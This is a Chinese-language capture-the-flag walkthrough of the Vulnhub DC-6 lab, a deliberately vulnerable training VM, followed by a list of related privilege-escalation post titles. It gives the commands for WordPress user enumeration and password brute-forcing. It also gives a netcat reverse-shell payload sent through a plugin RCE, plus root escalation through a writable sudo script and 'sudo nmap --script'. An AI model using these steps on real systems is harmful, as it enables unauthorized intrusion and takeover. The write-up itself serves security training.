DC-6-WordPress-nmap提權

NoCirc1e發表於2024-05-04

Vulnhub簡介

Vulnhub是一個提供了很多漏洞環境的靶場平臺，其中的環境基本上都是做好的虛擬機器映象檔案，需要使用VMware或者是VirtualBox執行。每個映象會有破解的目標，大多是Boot2root，從啟動虛擬機器到獲取作業系統的root許可權和檢視flag。

靶場部署

這個挑戰的最終目標是獲得root許可權並閱讀唯一的flag
vulnhub官網：https://www.vulnhub.com
下載地址：https://www.vulnhub.com/entry/dc-6,315/
1、直接從官網下載做好的虛擬機器映象檔案(推薦下載Mirror版本)；
2、解壓會得到一個.ova的檔案，然後在VMware中開啟即可；

資訊收集

靶機官網給出的兩個線索
需要去配置一下hosts檔案

Kali裡面的密碼本

1.掃描區域網主機

arp-scan -l

2.埠探測

nmap -sV -p- 192.168.75.158

可以看到開放了22和80埠
直接訪問80埠是不能夠解析出來的，我們需要去配置一下hosts檔案

Windows系統下在 C:\windows\system32\drivers\etc\hosts
開啟後在末尾新增：192.168.75.158 wordy
Linux系統下在/etc/hosts
vim /etc/hosts
#新增
192.168.75.158 wordy

現在訪問即可

是一個WordPress網站，Kali有專門的掃描工具wpscan

3.目錄掃描

apt-get install dirsearch
dirsearch -u http://192.168.75.158

4.wpscan掃描使用者

wpscan --url http://wordy/  -e u

找到五個使用者

爆破

1、找到五個使用者名稱：admin、graham、mark、sarah、jens，將使用者名稱放到一個檔案裡作為使用者名稱，然後再將rockyou.txt裡面的帶有k01的匯出作為密碼，進行爆破
（作者在vulnhub上給了個提示，為了減少暴力破解的時間，需要將包含“k01”的字串從字典裡篩選出來作為新字典用）

vim dc-username.txt #將使用者名稱放到其中
gunzip rockyou.txt.gz rockyou.txt #去rockyou.txt.gz所在的目錄解壓密碼本
cat /usr/share/wordlists/rockyou.txt | grep k01 > dc-passwd.txt #將帶有k01的密碼導到dc-paswd.txt中

2、使用wpscan來爆破

wpscan --url http://wordy/ -U dc-username.txt -P dc-passwd.txt

找到mark的密碼為：helpdesk01

登陸後臺
http://wordy/wp-login.php

後臺外掛getshell

1、利用Activity monitor外掛的rce漏洞來getshell
2、點選Activity monitor -> Tools

3、執行命令的同時使用burp抓包，傳送到repeater模組
前端限制了只能填寫15個字元，可以F12修改長度

反彈shell

Kali終端上：nc -lvvp 4444
burp抓包修改為：nc 192.168.75.150 4444 -e /bin/bash

獲取一個穩定一點的shell終端

python -c 'import pty;pty.spawn("/bin/bash")'

切換使用者

在/home/mark/stuff下發現一個檔案，記錄了使用者graham的密碼GSo7isUM1D4

成功切換到graham使用者下

提權

先檢視一下有沒有suid提權，沒有再使用sudo -l看一下可執行的命令
可以看到允許graham使用者在不深入jens使用者密碼的情況下，使用jens身份執行/home/jens/backups.sh這個指令碼檔案

檢視一下指令碼內容

cat /home/jens/backups.sh

我們現在可以執行這個指令碼，而且該指令碼也在jens的目錄下，那可以將/bin/bash寫到這個指令碼中，再以jens使用者來執行這個指令碼，那我們就可以獲得jens的shell了

echo "/bin/bash" >> backups.sh

然後以jens使用者執行

sudo -u jens ./backups.sh

已經切換到jens使用者
再使用sudo -l檢視一下可以執行的操作

發現是可以使用nmap的root許可權，將反彈shell的命令寫入到指令碼中，然後使用nmap來執行指令碼就可以獲得root使用者的shell了

echo 'os.execute("/bin/bash")' > shell
sudo nmap --script=shell

知識點總結

資訊收集
wpscan工具的使用，列舉使用者名稱，爆破登入
WordPress外掛activity monitor遠端程式碼執行漏洞
nmap提權

提權系列(二)----Windows Service 伺服器提權之Mssql提權,GetPass提權,hash提權,LPK提權
2017-03-29
Windows伺服器SQL
Linux提權————利用SUID提權
2018-05-23
LinuxUI
Windows提權實戰——————3、PcAnyWhere提權
2018-05-20
WindowsPCA
[提權禁區]1433埠入侵提權
2016-03-27
SQL Sever提權
2021-06-22
SQL
Linux 提權
2018-11-29
Linux
mysql UDF提權
2022-01-31
MySql
利用for命令提權
2012-05-02
Windows提權實戰——————1、IIS6.exe提權實戰
2018-05-14
Windows
Windows提權總結
2020-02-21
Windows
Powershell 提權框架-Powerup
2020-08-19
框架
Windows提權系列————上篇
2018-05-13
Windows
Windows提權系列————下篇
2018-05-13
Windows
Linux 提權-Capabilities
2024-06-17
Linux
Linux提權-許可權升級
2023-03-11
Linux
Linux提權————Linux下三種不同方式的提權技巧
2018-05-16
Linux
Potato家族本地提權分析
2020-12-01
提權學習筆記
2018-06-07
筆記
mssqlserver xp_cmdshell提權
2017-11-30
SQLServer
DC-5-screen提權
2024-05-04
DC-4-teehee提權
2024-05-04
DC-9-sudo提權
2024-05-04
Linux 提權-核心利用
2024-06-04
Linux
Linux 提權-Cron Jobs
2024-06-06
Linux
Linux 提權-MySQL UDF
2024-06-18
LinuxMySql
Linux 提權-LXD 容器
2024-06-27
Linux
Linux 提權-Docker 容器
2024-06-29
LinuxDocker
Windows PrintDemon提權漏洞分析
2020-05-25
Windows
Linux-SUID提權
2022-04-29
LinuxUI
mysql提權之mof詳解
2020-12-14
MySql
最全的伺服器提權
2018-07-04
伺服器
Windows提權基本原理
2018-05-13
Windows
SP_OACreate提權經驗
2018-05-13
Sa提權Sql語句大全
2018-05-13
SQL
DC-3-Joomla-Ubuntu提權
2024-05-04
OOMUbuntu
DC-2-WordPress-git提權
2024-05-04
Git
Raven-2-WordPress-UDF提權
2024-05-05
Linux 提權-Sudo_1
2024-05-17
Linux